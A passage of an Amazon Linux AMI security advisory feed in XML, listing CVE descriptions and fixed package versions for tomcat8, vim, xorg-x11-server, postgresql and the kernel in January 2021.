</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1935" title="" id="CVE-2020-1935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-javadoc" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.107-1.39.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.107" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.107-1.39.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1473</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1473: medium priority package update for tomcat8</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-17527:
While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.
1904221: CVE-2020-17527 tomcat: HTTP/2 request header mix-up
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17527" title="" id="CVE-2020-17527" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-admin-webapps" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.60-1.86.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.60" release="1.86.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.60-1.86.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1474</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1474: medium priority package update for vim</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20807:
A flaw was found in vim in the restricted mode, where all commands that make use of external shells are disabled. However, it was found that users could still execute some arbitrary OS commands in the restricted mode. This flaw was fixed by filtering the functions that can call OS commands. Interfaces such as Python, Ruby, and Lua, are also disabled, as they can be used to execute shell commands. Perl uses the Safe module.
1842658: CVE-2019-20807 vim: users can execute arbitrary OS commands via scripting interfaces in the rvim restricted mode
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20807" title="" id="CVE-2019-20807" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-minimal" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.0.0503-1.47.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.0.0503-1.47.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-filesystem-8.0.0503-1.47.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.0.0503-1.47.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.0.0503-1.47.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.0.0503-1.47.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.0.0503-1.47.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.0.0503-1.47.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.0.0503-1.47.amzn1.i686.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.47.amzn1" epoch="2" arch="i686"><filename>Packages/vim-filesystem-8.0.0503-1.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1475</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1475: important priority package update for xorg-x11-server</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14362:
A flaw was found in X.Org Server. An Integer underflow leading to heap-buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1869144: CVE-2020-14362 xorg-x11-server: XRecordRegisterClients integer underflow privilege escalation vulnerability
CVE-2020-14361:
A flaw was found in X.Org Server. An Integer underflow leading to heap-buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1869142: CVE-2020-14361 xorg-x11-server: XkbSelectEvents integer underflow privilege escalation vulnerability
CVE-2020-14346:
A flaw was found in xorg-x11-server. A integer underflow in the X input extension protocol decoding in the X server may lead to arbitrary access of memory contents. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1862246: CVE-2020-14346 xorg-x11-server: Integer underflow in the X input extension protocol
CVE-2020-14345:
A flaw was found in X.Org Server. An Out-Of-Bounds access in XkbSetNames function may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1862241: CVE-2020-14345 xorg-x11-server: Out-of-bounds access in XkbSetNames function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14345" title="" id="CVE-2020-14345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14346" title="" id="CVE-2020-14346" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14361" title="" id="CVE-2020-14361" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14362" title="" id="CVE-2020-14362" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.43.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.43.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.43.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.43.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.43.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1476</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1476: important priority package update for postgresql95 postgresql96</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25696:
A flaw was found in the psql interactive terminal of PostgreSQL. If an interactive psql session uses \gset when querying a compromised server, this flaw allows an attacker to execute arbitrary code as the operating system account running psql. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1894430: CVE-2020-25696 postgresql: psql's \gset allows overwriting specially treated variables
CVE-2020-25695:
A flaw was found in postgresql. An attacker having permission to create non-temporary objects in at least one schema can execute arbitrary SQL functions under the identity of a superuser. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1894425: CVE-2020-25695 postgresql: Multiple features escape "security restricted operation" sandbox
CVE-2020-25694:
A flaw was found in postgresql. If a client application that creates additional database connections only reuses the basic connection parameters while dropping security-relevant parameters, an opportunity for a man-in-the-middle attack, or the ability to observe clear-text transmissions, could exist. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1894423: CVE-2020-25694 postgresql: Reconnection can downgrade connection security settings
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25694" title="" id="CVE-2020-25694" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25695" title="" id="CVE-2020-25695" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25696" title="" id="CVE-2020-25696" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql95-test" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.24" release="1.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.24-1.82.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.24" release="1.82.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.24-1.82.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.20" release="1.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.20-1.84.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.20-1.84.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.20" release="1.84.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.20-1.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1477</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1477: important priority package update for kernel</title><issued date="2021-01-26 00:11:00" /><updated date="2021-01-26 19:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-29661:
A locking vulnerability was found in the tty subsystem of the Linux kernel in drivers/tty/tty_jobctrl.c. This flaw allows a local attacker to possibly corrupt memory or escalate privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1906525: CVE-2020-29661 kernel: locking issue in drivers/tty/tty_jobctrl.c can lead to an use-after-free
CVE-2020-29660:
A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID, aka CID-c8bcd9c5be24.
1906522: CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free
CVE-2020-29569:
99999:
CVE-2020-29568:
99999:
CVE-2020-27815:
No description is available for this CVE.
1897668: CVE-2020-27815 kernel: Array index out of bounds access when setting extended attributes on journaling filesystems.
CVE-2019-19816:
A flaw was found in the implementation of the BTRFS file system code in the Linux kernel. An attacker, who is able to mount a crafted BTRFS filesystem and perform common filesystem operations, can possibly cause an out-of-bounds write to memory. This could lead to memory corruption or privilege escalation.
1784923: CVE-2019-19816 kernel: out-of-bounds write in __btrfs_map_block in fs/btrfs/volumes.c
CVE-2019-19813:
In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c. This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c.
1784911: CVE-2019-19813 kernel: use-after-free in __mutex_lock in kernel/locking/mutex.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19813" title="" id="CVE-2019-19813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19816" title="" id="CVE-2019-19816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27815" title="" id="CVE-2020-27815" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29568" title="" id="CVE-2020-29568" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29569" title="" id="CVE-2020-29569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29660" title="" id="CVE-2020-29660" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29661" title="" id="CVE-2020-29661" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.214-118.339.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.214" release="118.339.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.214-118.339.amzn1.i686.rpm</filename></package><package name="kernel-tools" 